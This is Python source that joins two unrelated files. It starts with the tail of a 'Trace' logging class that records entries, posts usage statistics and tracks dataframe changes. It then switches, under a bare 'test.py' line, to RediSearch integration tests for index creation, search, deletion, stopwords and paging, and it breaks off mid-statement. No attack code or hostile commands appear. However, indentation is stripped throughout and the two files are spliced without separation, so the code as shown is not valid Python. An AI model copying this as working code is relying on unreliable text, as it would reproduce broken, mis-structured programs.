entry = {**entry, **df_info}
self.data.append(entry)
exception_type = entry.get('exception_type', None)
exception = entry.get('exception', None)
stack_trace = entry.get('stack_trace', None)
try:
if log_method is not None:
log_method(text)
if exception_type is not None:
log_method(exception_type)
if exception is not None:
log_method(exception)
if stack_trace is not None:
log_method(stack_trace)
except TypeError:
# msg = 'A write to the trace called an invalid logging method. Logging as warning: %s' % text
logger.warning(text)
if exception_type is not None:
logger.warning(exception_type)
if exception is not None:
logger.warning(exception)
if stack_trace is not None:
logger.warning(stack_trace)
def write_usage(self, db, start_ts=None, end_ts=None):
"""
Write usage stats to the usage log
"""
usage_logged = False
msg = 'No db object provided. Did not write usage'
usage = []
for i in self.data:
result = int(i.get('usage', 0))
if end_ts is None:
end_ts = dt.datetime.utcnow()
if start_ts is None:
elapsed = float(i.get('elapsed_time', '0'))
start_ts = end_ts - dt.timedelta(seconds=elapsed)
if result > 0:
entry = {"entityTypeName": self.parent.name, "kpiFunctionName": i.get('created_by', 'unknown'),
"startTimestamp": str(start_ts), "endTimestamp": str(end_ts),
"numberOfResultsProcessed": result}
usage.append(entry)
if len(usage) > 0:
if db is not None:
try:
db.http_request(object_type='usage', object_name='', request='POST', payload=usage)
except BaseException as e:
msg = 'Unable to write usage. %s' % str(e)
else:
usage_logged = True
else:
msg = 'No usage recorded for this execution'
if not usage_logged:
logger.info(msg)
if len(usage) > 0:
logger.info(usage)
def _df_as_dict(self, df):
"""
Gather stats about changes to the dataframe between trace entries
"""
data = {}
if df is None:
data['df'] = 'Ignored null dataframe'
elif not isinstance(df, pd.DataFrame):
data['df'] = 'Ignored non dataframe of type %s' % df.__class__.__name__
else:
if len(df.index) > 0:
prev_count = self.df_count
prev_cols = self.df_cols
self.df_count = len(df.index)
if df.index.names is None:
                    self.df_index = set()
else:
self.df_index = set(df.index.names)
self.df_cols = set(df.columns)
# stats
data['df_count'] = self.df_count
data['df_index'] = list(self.df_index)
# look at changes
if self.df_count != prev_count:
data['df_rowcount_change'] = self.df_count - prev_count
if len(self.df_cols - prev_cols) > 0:
data['df_added_columns'] = list(self.df_cols - prev_cols)
if len(prev_cols - self.df_cols) > 0:
                    data['df_removed_columns'] = list(prev_cols - self.df_cols)
else:
data['df'] = 'Empty dataframe'
return data
def __str__(self):
out = ''
for entry in self.data:
out = out + entry['text']
return out
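# Hedged usage sketch (illustrative only): a Trace accumulates timestamped entries via
# write(), can track dataframe changes between writes, and save() either writes a local
# <name>.json file or pushes to COS when a db object was supplied. The parent object here
# is a stand-in with only the attributes Trace expects; all names are made up.
def _example_trace():
    class _Parent(object):
        name = 'example_entity'
        tenant_id = 'example_tenant'
        save_trace_to_file = True
    trace = Trace(object_name='example_entity', parent=_Parent(), db=None)
    trace.write(created_by='example_stage', text='stage started. ', log_method=logger.debug)
    trace.update_last_entry(msg='stage finished.', usage=10)
    return trace.save()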
test.py
# -*- coding: utf-8 -*-
import redis
import unittest
from hotels import hotels
import random
import time
from RLTest import Env
from includes import *
def testAdd(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
env.assertTrue(r.exists('idx:idx'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
for _ in r.retry_with_rdb_reload():
prefix = 'ft'
env.assertExists(prefix + ':idx/hello')
env.assertExists(prefix + ':idx/world')
env.assertExists(prefix + ':idx/lorem')
def testAddErrors(env):
env.expect('ft.create idx schema foo text bar numeric sortable').equal('OK')
env.expect('ft.add idx doc1 1 redis 4').error().contains('Unknown keyword')
env.expect('ft.add idx doc1').error().contains("wrong number of arguments")
env.expect('ft.add idx doc1 42').error().contains("Score must be between 0 and 1")
env.expect('ft.add idx doc1 1.0').error().contains("No field list found")
env.expect('ft.add fake_idx doc1 1.0 fields foo bar').error().contains("Unknown index name")
def assertEqualIgnoreCluster(env, val1, val2):
    # todo: each test that uses this function should be switched back to env.assertEqual
    # once the issues on the coordinator are fixed
if env.isCluster():
return
env.assertEqual(val1, val2)
def testConditionalUpdate(env):
env.assertOk(env.cmd(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1',
'fields', 'foo', 'hello', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '1 == 2', 'fields', 'foo', 'world', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'partial', 'if',
'@foo == "world"', 'fields', 'bar', '234'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@bar == 234', 'fields', 'foo', 'hello', 'bar', '123'))
# Ensure that conditionals are ignored if the document doesn't exist
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails if we try again, because it already exists
env.assertEqual('NOADD', env.cmd('FT.ADD', 'idx', '666', '1',
'REPLACE', 'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails because we're not using 'REPLACE'
with env.assertResponseError():
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
def testUnionIdList(env):
# Regression test for https://github.com/RediSearch/RediSearch/issues/306
r = env
N = 100
env.assertOk(r.execute_command(
"ft.create", "test", "SCHEMA", "tags", "TAG", "waypoint", "GEO"))
env.assertOk(r.execute_command(
"ft.add", "test", "1", "1", "FIELDS", "tags", "alberta", "waypoint", "-113.524,53.5244"))
env.assertOk(r.execute_command(
"ft.add", "test", "2", "1", "FIELDS", "tags", "ontario", "waypoint", "-79.395,43.661667"))
r.cmd('ft.search', 'test', '@tags:{ontario}')
res = r.execute_command(
'ft.search', 'test', "@waypoint:[-113.52 53.52 20 mi]|@tags:{ontario}", 'nocontent')
env.assertEqual(res, [2, '2', '1'])
def testAttributes(env):
env.assertOk(env.cmd('ft.create', 'idx', 'schema',
'title', 'text', 'body', 'text'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 't1 t2', 'body', 't3 t4 t5'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'body', 't1 t2', 'title', 't3 t5'))
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 0.2}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 2.5}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc1', 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t3 t5) => {$slop: 4}', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0}', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0; $inorder:true}', 'nocontent')
env.assertListEqual([0], res)
def testUnion(env):
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world' if i % 2 == 0 else 'hallo werld'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello|hallo', 'nocontent', 'limit', '0', '100')
env.assertEqual(N + 1, len(res))
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello|world', 'nocontent', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command('ft.search', 'idx', '(hello|hello)(world|world)',
'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo)(werld|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hallo|hello)(world|werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|werld)(hallo|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo) world', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello world)|((hello world)|(hallo world|werld) | hello world werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
def testSearch(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello')
env.assertTrue(len(res) == 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(isinstance(res[2], list))
env.assertTrue('title' in res[2])
env.assertTrue('hello another world' in res[2])
env.assertEqual(res[3], "doc1")
env.assertTrue('hello world' in res[4])
# Test empty query
res = r.execute_command('ft.search', 'idx', '')
env.assertListEqual([0], res)
# Test searching with no content
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent')
env.assertTrue(len(res) == 3)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertEqual(res[2], "doc1")
# Test searching WITHSCORES
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES')
env.assertEqual(len(res), 7)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[4], "doc1")
env.assertTrue(float(res[5]) > 0)
# Test searching WITHSCORES NOCONTENT
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES', 'NOCONTENT')
env.assertEqual(len(res), 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[3], "doc1")
env.assertTrue(float(res[4]) > 0)
def testSearchNosave(env):
# Check to see what happens when we try to return unsaved documents
env.cmd('ft.create', 'idx', 'SCHEMA', 'f1', 'text')
# Add 3 documents
for x in range(3):
env.cmd('ft.add', 'idx', 'doc{}'.format(x),
1.0, 'NOSAVE', 'FIELDS', 'f1', 'value')
# Now query the results
res = env.cmd('ft.search', 'idx', 'value')
env.assertEqual(3, res[0])
for content in res[2::2]:
env.assertEqual([], content)
def testGet(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'text'))
env.expect('ft.get').error().contains("wrong number of arguments")
env.expect('ft.get', 'idx').error().contains("wrong number of arguments")
env.expect('ft.get', 'idx', 'foo', 'bar').error().contains("wrong number of arguments")
env.expect('ft.mget').error().contains("wrong number of arguments")
env.expect('ft.mget', 'idx').error().contains("wrong number of arguments")
env.expect('ft.mget', 'fake_idx').error().contains("wrong number of arguments")
env.expect('ft.get fake_idx foo').error().contains("Unknown Index name")
env.expect('ft.mget fake_idx foo').error().contains("Unknown Index name")
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world', 'bar', 'wat wat'))
for i in range(100):
res = r.execute_command('ft.get', 'idx', 'doc%d' % i)
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
env.assertIsNone(r.execute_command(
'ft.get', 'idx', 'doc%dsdfsd' % i))
env.expect('ft.get', 'no_idx', 'doc0').error().contains("Unknown Index name")
rr = r.execute_command(
'ft.mget', 'idx', *('doc%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
rr = r.execute_command(
'ft.mget', 'idx', *('doc-%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNone(res)
# Verify that when a document is deleted, GET returns NULL
r.cmd('ft.del', 'idx', 'doc10') # But we still keep the document
r.cmd('ft.del', 'idx', 'doc11')
r.cmd('ft.del', 'idx', 'coverage')
res = r.cmd('ft.get', 'idx', 'doc10')
r.assertEqual(None, res)
res = r.cmd('ft.mget', 'idx', 'doc10')
r.assertEqual([None], res)
res = r.cmd('ft.mget', 'idx', 'doc10', 'doc11', 'doc12')
r.assertIsNone(res[0])
r.assertIsNone(res[1])
    r.assertTrue(bool(res[2]))
def testDelete(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
env.expect('ft.del', 'fake_idx', 'doc1').error()
for i in range(100):
# the doc hash should exist now
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
# Delete the actual docs only half of the time
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i, 'DD' if i % 2 == 0 else ''))
# second delete should return 0
env.assertEqual(0, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
# After del with DD the doc hash should not exist
if i % 2 == 0:
env.assertFalse(r.exists('doc%d' % i))
else:
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertNotIn('doc%d' % i, res)
env.assertEqual(res[0], 100 - i - 1)
env.assertEqual(len(res), 100 - i)
# test reinsertion
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertIn('doc%d' % i, res)
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in r.retry_with_rdb_reload():
did = 'rrrr'
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
def testReplace(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(2, res[0])
with env.assertResponseError():
# make sure we can't insert a doc twice
res = r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world')
# now replace doc1 with a different content
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'replace', 'fields',
'f', 'goodbye universe'))
for _ in r.retry_with_rdb_reload():
# make sure the query for hello world does not return the replaced
# document
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc2', res[1])
# search for the doc's new content
res = r.execute_command(
'ft.search', 'idx', 'goodbye universe', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
def testDrop(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
env.assertOk(r.execute_command('ft.drop', 'idx'))
keys = r.keys('*')
env.assertEqual(0, len(keys))
# Now do the same with KEEPDOCS
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
if not env.is_cluster():
env.assertOk(r.execute_command('ft.drop', 'idx', 'KEEPDOCS'))
keys = r.keys('*')
env.assertListEqual(['doc0', 'doc1', 'doc10', 'doc11', 'doc12', 'doc13', 'doc14', 'doc15', 'doc16', 'doc17', 'doc18', 'doc19', 'doc2', 'doc20', 'doc21', 'doc22', 'doc23', 'doc24', 'doc25', 'doc26', 'doc27', 'doc28', 'doc29', 'doc3', 'doc30', 'doc31', 'doc32', 'doc33', 'doc34', 'doc35', 'doc36', 'doc37', 'doc38', 'doc39', 'doc4', 'doc40', 'doc41', 'doc42', 'doc43', 'doc44', 'doc45', 'doc46', 'doc47', 'doc48', 'doc49', 'doc5', 'doc50', 'doc51', 'doc52', 'doc53',
'doc54', 'doc55', 'doc56', 'doc57', 'doc58', 'doc59', 'doc6', 'doc60', 'doc61', 'doc62', 'doc63', 'doc64', 'doc65', 'doc66', 'doc67', 'doc68', 'doc69', 'doc7', 'doc70', 'doc71', 'doc72', 'doc73', 'doc74', 'doc75', 'doc76', 'doc77', 'doc78', 'doc79', 'doc8', 'doc80', 'doc81', 'doc82', 'doc83', 'doc84', 'doc85', 'doc86', 'doc87', 'doc88', 'doc89', 'doc9', 'doc90', 'doc91', 'doc92', 'doc93', 'doc94', 'doc95', 'doc96', 'doc97', 'doc98', 'doc99'], sorted(keys))
env.expect('FT.DROP', 'idx', 'KEEPDOCS', '666').error().contains("wrong number of arguments")
def testCustomStopwords(env):
r = env
# Index with default stopwords
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
# Index with custom stopwords
env.assertOk(r.execute_command('ft.create', 'idx2', 'stopwords', 2, 'hello', 'world',
'schema', 'foo', 'text'))
    if not env.isCluster():
res = env.cmd('ft.info', 'idx2')
env.assertEqual(res[39], ['hello', 'world'])
# Index with NO stopwords
env.assertOk(r.execute_command('ft.create', 'idx3', 'stopwords', 0,
'schema', 'foo', 'text'))
    if not env.isCluster():
res = env.cmd('ft.info', 'idx3')
env.assertEqual(res[39], [])
for idx in ('idx', 'idx2', 'idx3'):
env.assertOk(r.execute_command(
'ft.add', idx, 'doc1', 1.0, 'fields', 'foo', 'hello world'))
env.assertOk(r.execute_command(
'ft.add', idx, 'doc2', 1.0, 'fields', 'foo', 'to be or not to be'))
for _ in r.retry_with_rdb_reload():
# Normal index should return results just for 'hello world'
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent'))
env.assertEqual([0], r.execute_command(
'ft.search', 'idx', 'to be or not', 'nocontent'))
# Custom SW index should return results just for 'to be or not'
env.assertEqual([0], r.execute_command(
'ft.search', 'idx2', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx2', 'to be or not', 'nocontent'))
# No SW index should return results for both
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx3', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx3', 'to be or not', 'nocontent'))
def testStopwords(env):
# This test was taken from Python's tests, and failed due to some changes
# made earlier
env.cmd('ft.create', 'idx', 'stopwords', 3, 'foo',
'bar', 'baz', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'foo bar')
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields', 'txt', 'hello world')
r1 = env.cmd('ft.search', 'idx', 'foo bar', 'nocontent')
r2 = env.cmd('ft.search', 'idx', 'foo bar hello world', 'nocontent')
env.assertEqual(0, r1[0])
env.assertEqual(1, r2[0])
def testNoStopwords(env):
    # This test was taken from Java's test suite
env.cmd('ft.create', 'idx', 'schema', 'title', 'text')
for i in range(100):
env.cmd('ft.add', 'idx', 'doc{}'.format(i), 1.0, 'fields',
'title', 'hello world' if i % 2 == 0 else 'hello worlds')
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOCONTENT')
env.assertEqual(100, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world',
'VERBATIM', 'NOCONTENT')
env.assertEqual(50, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOSTOPWORDS')
env.assertEqual(0, res[0])
def testOptional(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', 1.0, 'fields', 'foo', 'hello wat woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'foo', 'hello world woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'foo', 'hello world werld'))
res = r.execute_command('ft.search', 'idx', 'hello', 'nocontent')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([2L, 'doc3', 'doc2'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world ~werld', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', '~world ~werld hello', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
def testExplain(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
q = '(hello world) "what what" hello|world @bar:[10 100]|@bar:[200 300]'
res = r.execute_command('ft.explain', 'idx', q)
# print res.replace('\n', '\\n')
# expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
# expected = """INTERSECT {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
env.assertEqual(res, expected)
# expected = ['INTERSECT {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
if env.is_cluster():
raise unittest.SkipTest()
res = env.cmd('ft.explainCli', 'idx', q)
expected = ['INTERSECT {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
env.assertEqual(expected, res)
def testNoIndex(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex', 'sortable'))
if not env.isCluster():
        # too specific a check to run on cluster; todo: change it to be generic enough
res = env.cmd('ft.info', 'idx')
env.assertEqual(res[5][1][4], 'NOINDEX')
env.assertEqual(res[5][2][6], 'NOINDEX')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'hello lorem ipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1, 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@extra:hello', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@num:[1 1]', 'nocontent')
env.assertListEqual([0], res)
def testPartial(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex'))
# print r.execute_command('ft.info', 'idx')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', '0.1', 'fields',
'foo', 'hello world', 'num', 2, 'extra', 'abba'))
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'asc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc1', '#1', 'doc2', '#2'], res)
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'desc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc2', '#2', 'doc1', '#1'], res)
# Updating non indexed fields doesn't affect search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'num', 3, 'extra', 'jorem gipsum'))
env.expect('ft.add', 'idx', 'doc12', '0.1', 'replace', 'partial',
'fields', 'num1', 'redis').equal('OK')
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'sortby', 'num', 'desc',)
assertResultsEqual(env, [2L, 'doc1', ['foo', 'hello world', 'num', '3', 'extra', 'jorem gipsum'],
'doc2', ['foo', 'hello world', 'num', '2', 'extra', 'abba']], res)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'withscores')
# Updating only indexed field affects search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'foo', 'wat wet'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = r.execute_command('ft.search', 'idx', 'wat', 'nocontent')
env.assertListEqual([1L, 'doc1'], res)
# Test updating of score and no fields
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertLess(float(res[2]), 1)
# env.assertListEqual([1L, 'doc1'], res)
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', '1.0', 'replace', 'partial', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertGreater(float(res[2]), 1)
# Test updating payloads
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertIsNone(res[2])
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '1.0',
'replace', 'partial', 'payload', 'foobar', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertEqual('foobar', res[2])
def testPaging(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1, 'fields',
'foo', 'hello', 'bar', i))
chunk = 7
offset = 0
while True:
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'desc', 'limit', offset, chunk)
env.assertEqual(res[0], N)
if offset + chunk > N:
env.assertTrue(len(res) - 1 <= chunk)
break
env.assertEqual(len(res), chunk + 1)
for n, id in enumerate(res[1:]):
env.assertEqual(int(id), N - 1 - (offset + n))
offset += chunk
chunk = random.randrange(1, 10)
res = r.execute_command(
